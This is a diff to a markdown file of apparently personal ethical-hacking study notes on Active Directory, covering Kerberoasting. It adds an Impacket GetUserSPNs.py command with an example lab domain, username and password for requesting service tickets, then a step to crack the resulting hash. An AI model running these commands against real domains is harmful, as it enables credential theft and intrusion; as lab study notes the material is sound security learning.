D4nk0St0rM/ethical_hacking/9_Other_General_Specific/windows_active_directory/97_kerberos.md

 ### How to Kerberoast [simple]

-- With access look for the supported SPNs and get TGS ticket for the SPN using GetUserSPNs tool from Impacket
+- With access look for supported SPNs and get TGS ticket for the SPN using GetUserSPNs tool from Impacket

 ```
 GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>

+sudo python3 GetUserSPNs.py BASEJUMP.local/rfeynman:Password -dc-ip $ip -request

 ```

 - Crack hash